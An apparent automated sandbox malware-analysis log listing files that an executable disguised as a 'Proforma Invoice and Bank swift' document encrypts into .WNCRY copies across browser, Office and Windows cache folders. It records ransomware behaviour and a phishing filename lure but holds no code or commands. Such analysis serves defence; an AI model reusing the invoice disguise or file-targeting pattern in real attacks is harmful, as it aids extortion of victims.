            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410582984954725.txt.WNCRY (copy) entropy: 7.99833518582Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410583284348700.txt.WNCRY (copy) entropy: 7.99851139262Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410584556659274.txt.WNCRY (copy) entropy: 7.9983023214Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410584609702615.txt.WNCRY (copy) entropy: 7.99847071519Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410586637015569.txt.WNCRY (copy) entropy: 7.99828812156Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498762936491601.txt.WNCRY (copy) entropy: 7.99836051251Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498763235716446.txt.WNCRY (copy) entropy: 7.99848327859Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498763707955679.txt.WNCRY (copy) entropy: 7.99832759783Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy) entropy: 7.99973269348Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRY (copy) entropy: 7.9913189825Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRY (copy) entropy: 7.99982687688Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.WNCRY (copy) entropy: 7.99632261397Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRY (copy) entropy: 7.9940420487Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRY (copy) entropy: 7.99963243635Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRY (copy) entropy: 7.99940380078Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRY (copy) entropy: 7.99731989835Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.WNCRY (copy) entropy: 7.99279688532Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRY (copy) entropy: 7.99035057799Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.WNCRY (copy) entropy: 7.99419777368Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db.WNCRY (copy) entropy: 7.99108007411Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js.WNCRY (copy) entropy: 7.99783772905Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js.WNCRY (copy) entropy: 7.99983906533Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js.WNCRY (copy) entropy: 7.99981989883Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js.WNCRY (copy) entropy: 7.99980488019Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.WNCRY (copy) entropy: 7.99988569371Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.WNCRY (copy) entropy: 7.99757883385Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.WNCRY (copy) entropy: 7.99980432681Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.WNCRY (copy) entropy: 7.99996173264Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.WNCRY (copy) entropy: 7.99949809295Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.WNCRY (copy) entropy: 7.99990658852Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.WNCRY (copy) entropy: 7.99436172655Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.WNCRY (copy) entropy: 7.99986298769Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRY (copy) entropy: 7.99993842295Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.WNCRY (copy) entropy: 7.99978863472Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.WNCRY (copy) entropy: 7.99947194807Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.WNCRY (copy) entropy: 7.99967272227Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.WNCRY (copy) entropy: 7.99938505594Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.WNCRY (copy) entropy: 7.99960343992Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.WNCRY (copy) entropy: 7.99986148704Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRY (copy) entropy: 7.99131035969Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRY (copy) entropy: 7.991931964Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRY (copy) entropy: 7.99340694608Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRY (copy) entropy: 7.99268727442Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRY (copy) entropy: 7.99096314975Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{0DD3376E-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRY (copy) entropy: 7.99948616661Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db.WNCRY (copy) entropy: 7.99797071147Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.WNCRY (copy) entropy: 7.99751823991Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.WNCRY (copy) entropy: 7.99861469809Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRY (copy) entropy: 7.99980718063Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRY (copy) entropy: 7.99993977368Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRY (copy) entropy: 7.99991549121Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRY (copy) entropy: 7.99982084665Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRY (copy) entropy: 7.99632635728Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRY (copy) entropy: 7.99986205221Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRY (copy) entropy: 7.99984031204Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRY (copy) entropy: 7.99981121368Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRY (copy) entropy: 7.9998289363Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRY (copy) entropy: 7.99995472416Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRY (copy) entropy: 7.99382500932Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2[1].js.WNCRY (copy) entropy: 7.99959486929Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js.WNCRY (copy) entropy: 7.9995646137Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\90SNK17T\oneDs_f2e0f4a029670f10d892[1].js.WNCRY (copy) entropy: 7.99920831239Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qoVhSFA2[1].js.WNCRY (copy) entropy: 7.99457580934Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js.WNCRY (copy) entropy: 7.99459450107Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRY (copy) entropy: 7.99985568418Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\microsoft-365-logo-01d5ecd01a[1].png.WNCRY (copy) entropy: 7.99186739012Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7[1].js.WNCRY (copy) entropy: 7.99525127513Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-bootstrap-5e7af218e953d095fabf[1].js.WNCRY (copy) entropy: 7.99793675084Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-mru.2ce72562ad7c0ae7059c.chunk.v7[1].js.WNCRY (copy) entropy: 7.99519416221Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.WNCRY (copy) entropy: 7.99972298792Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\otel-logger-104bffe9378b8041455c[1].js.WNCRY (copy) entropy: 7.9982805142Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-bundle-3a99f64809c6780df035[1].js.WNCRY (copy) entropy: 7.99984900179Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js.WNCRY (copy) entropy: 7.99592796159Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\sharedscripts-939520eada[1].js.WNCRY (copy) entropy: 7.99666016174Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy) entropy: 7.99989075045Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy) entropy: 7.99988710524Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js.WNCRY (copy) entropy: 7.99807321117Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js.WNCRY (copy) entropy: 7.99533292633Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\58urCM4ERwTmgZF8atjxpMnY4I4.br[1].js.WNCRY (copy) entropy: 7.99948246376Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\5fBhIWX2NfxoiM-aOLeKJczoLSY.br[1].js.WNCRY (copy) entropy: 7.99917311495Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js.WNCRY (copy) entropy: 7.99862496154Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRY (copy) entropy: 7.99860709509Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js.WNCRY (copy) entropy: 7.99875831532Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\dMxp0YQLz5hOQviuFXI5GuahQMU.br[1].js.WNCRY (copy) entropy: 7.99890340777Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\D_0mE1U1YmZvpLaz5wDHB6P-DAI.br[1].js.WNCRY (copy) entropy: 7.9990600479Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\EYNLM9RfkEXFtD8WH1unvJjwzGA.br[1].js.WNCRY (copy) entropy: 7.99043912244Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\KF9j9oJUfaaKiX-84yf0U337ge8.br[1].js.WNCRY (copy) entropy: 7.99990849273Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js.WNCRY (copy) entropy: 7.9995679726Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\mb8fkd60iW7q4wvyDIlCm9OOn10.br[1].js.WNCRY (copy) entropy: 7.9960800471Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.WNCRY (copy) entropy: 7.99802962828Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\pqKAmz-4RXsuUf_YO-8_wQDepUQ.br[1].js.WNCRY (copy) entropy: 7.99590606653Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js.WNCRY (copy) entropy: 7.99882085293Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\wokAADULDNIRJUcpGmEjmH9QAB0.br[1].js.WNCRY (copy) entropy: 7.99940273021Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\XDTV5Ztdmvo1jmUE21mPICYC5h8.br[1].js.WNCRY (copy) entropy: 7.99962939996Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js.WNCRY (copy) entropy: 7.99700668457Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js.WNCRY (copy) entropy: 7.99694154247Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js.WNCRY (copy) entropy: 7.99787015795Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\4tiHI4cTzqiixje34Lb3KTOm39Q[1].js.WNCRY (copy) entropy: 7.99671244277Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[1].png.WNCRY (copy) entropy: 7.9910278599Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[2].png.WNCRY (copy) entropy: 7.99088540788Jump to dropped file
